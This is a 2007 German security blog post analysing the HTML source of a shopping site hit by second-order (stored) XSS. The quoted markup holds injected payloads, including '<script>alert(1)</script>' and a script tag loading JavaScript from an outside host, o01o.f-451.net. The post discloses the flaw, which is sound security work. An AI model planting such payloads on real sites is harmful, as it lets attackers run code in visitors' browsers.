Softwareentwicklung Beratung Unternehmen Ressourcen Karriere
Mayflower

Get social with Mayflower!


... or look on our website (German version).

Quicksearch

Syndicate This Blog

Webinarreihe




Das nächste Webinar findet am 16.05.12 um 14:00 Uhr zum Thema Mobiles Umdenken - HTML5-Apps für Businessanwendungen statt.

Zend Framework Poster



Get your Zend Framework poster for free!

Categories



All categories

Blogroll

We read:

Planet PHP
Planet MySQL
Exciting E-Commerce
E-Commerce Blog
Fischmarkt
fukami
Lars Jankowfsky
Themenblog
Thomas Bachem
Matt Asay on OpenSource
Joel on Software
Ibrahim Evsan
Hasematzel
Techcrunch
Indiskretion Ehrensache
Sichelputzer
Alexander Schwinn
Managing Tech
F-LOG-GE
trycatchfinally

PHProjekt Developer Blog

PHProjekt 6.0.5 released

Tuesday, November 30. 2010
PHProjekt 6.0.3 released

Thursday, August 12. 2010
PHProjekt 6.0.2 released

Saturday, May 22. 2010

phpMyFAQ devBlog

Off to Cuba
Sunday, April 3. 2011
phpMyFAQ 2.7.0-alpha2 Released!
Wednesday, March 23. 2011
phpMyFAQ 2.6.15 Released!
Wednesday, February 23. 2011

Technorati

Mayflower Blog

Update: Analyse des HTML Sourcecodes der Second Order Attacke

Friday, May 4. 2007

Update: Analyse des HTML Sourcecodes der Second Order Attacke

Ein kleines Update zum vorherigen Beitrag: der Nutzer "lars" schien harmlos zu sein. Schaut man sich den HTML-Quellcode näher an, kommt ein altbekanntes Gesicht zum Vorschein: 

		
<div class="listitem searchlists">
		<a href="index.php?action=lists&subaction=show_detail&list_lookup_id=111128">
<img class="listthumb" src="http://s3.amazonaws.com/product_thumbs/" alt="" title=""/></a>
		<span class="listtitle">"><script>alert(1)</script></span><br />

		"><script>alert(1)</script><br />
		<span class="addedby">Erstellt von lars</span>
	</div>
		<div class="listitem searchlists">
		<a href="index.php?action=lists&subaction=show_detail&list_lookup_id=111129">
<img class="listthumb" src="http://s3.amazonaws.com/product_thumbs/" alt="" title=""/></a>
		<span class="listtitle">"><script>alert(1)</script></span><br />

		"><script>alert(1)</script><br />
		<span class="addedby">Erstellt von lars</span>
	</div>
		<div class="listitem searchlists">
		<a href="index.php?action=lists&subaction=show_detail&list_lookup_id=111130">
<img class="listthumb" src="http://s3.amazonaws.com/product_thumbs/" alt="fnord fnord">fnord
<script src=http://o01o.f-4" title="fnord fnord">fnord<script src=http://o01o.f-4"/></a>
		<span class="listtitle">"><script src=http://o01o.f-451.net/a.js></sc</span><br />
		"><script src=http://o01o.f-451.net/a.js></script>foo<br />
		<span class="addedby">Erstellt von fukami</span>

 

fukami.

Posted by Björn Schotte in Chorizo E-Commerce at 09:16 | Comments (0) | Trackback (1)
Defined tags for this entry: ,
Related entries by tags:
Nginx Rewrite Regeln für OXID eShop
Oxid Commons and Unconference 2011
c't empfiehlt Chorizo für ajax Sicherheitsprüfungen
Sicherheit und Skalierbarkeit im E-Commerce
MAYFLOWER zertifiziert seine Software-Entwickler für OXID eShop Enterprise Edition
OXID Premium Solution Partner: Mayflower als E-Commerce Lösungsprovider
Die Sache mit den AGBs und Datenschutzerklärungen
shoppero.com gleich erstes Opfer von Second Order XSS Attacks
XSS and CSRF made easy
Die Bahn kommt mobil...
Bookmark Update: Analyse des HTML Sourcecodes der Second Order Attacke at del.icio.us Digg Update: Analyse des HTML Sourcecodes der Second Order Attacke Bloglines Update: Analyse des HTML Sourcecodes der Second Order Attacke Technorati Update: Analyse des HTML Sourcecodes der Second Order Attacke Fark this: Update: Analyse des HTML Sourcecodes der Second Order Attacke Bookmark Update: Analyse des HTML Sourcecodes der Second Order Attacke at YahooMyWeb Bookmark Update: Analyse des HTML Sourcecodes der Second Order Attacke at Furl.net Bookmark Update: Analyse des HTML Sourcecodes der Second Order Attacke at reddit.com Bookmark Update: Analyse des HTML Sourcecodes der Second Order Attacke at blinklist.com Bookmark Update: Analyse des HTML Sourcecodes der Second Order Attacke at Spurl.net Bookmark Update: Analyse des HTML Sourcecodes der Second Order Attacke at NewsVine Bookmark Update: Analyse des HTML Sourcecodes der Second Order Attacke at Simpy.com Bookmark Update: Analyse des HTML Sourcecodes der Second Order Attacke at blogmarks Bookmark Update: Analyse des HTML Sourcecodes der Second Order Attacke with wists Bookmark Update: Analyse des HTML Sourcecodes der Second Order Attacke at Ma.gnolia.com

Trackbacks
Trackback specific URI for this entry

shoppero.com gleich erstes Opfer von Second Order XSS Attacks
Ich wollte Nico Lumma zum Launch von shoppero.com beglückwünschen und wie es sich unter Kollegen gehört per E-Mail noch ein paar Verbesserungswünsche (auch aus sicherheitstechnischer Sicht) zum Launch zumailen. Über die Vorstellung eines sogenannten Adg
Weblog: ThinkPHP /dev/blog
Tracked: May 04, 09:24

Comments
Display comments as (Linear | Threaded)

No comments

Add Comment
Name
Email
Homepage
In reply to
Comment
E-Mail addresses will not be displayed and will only be used for E-Mail notifications.

To prevent automated Bots from commentspamming, please enter the string you see in the image below in the appropriate input box. Your comment will only be submitted if the strings match. Please ensure that your browser supports and accepts cookies, or your comment cannot be verified correctly.
CAPTCHA
 
Submitted comments will be subject to moderation before being displayed.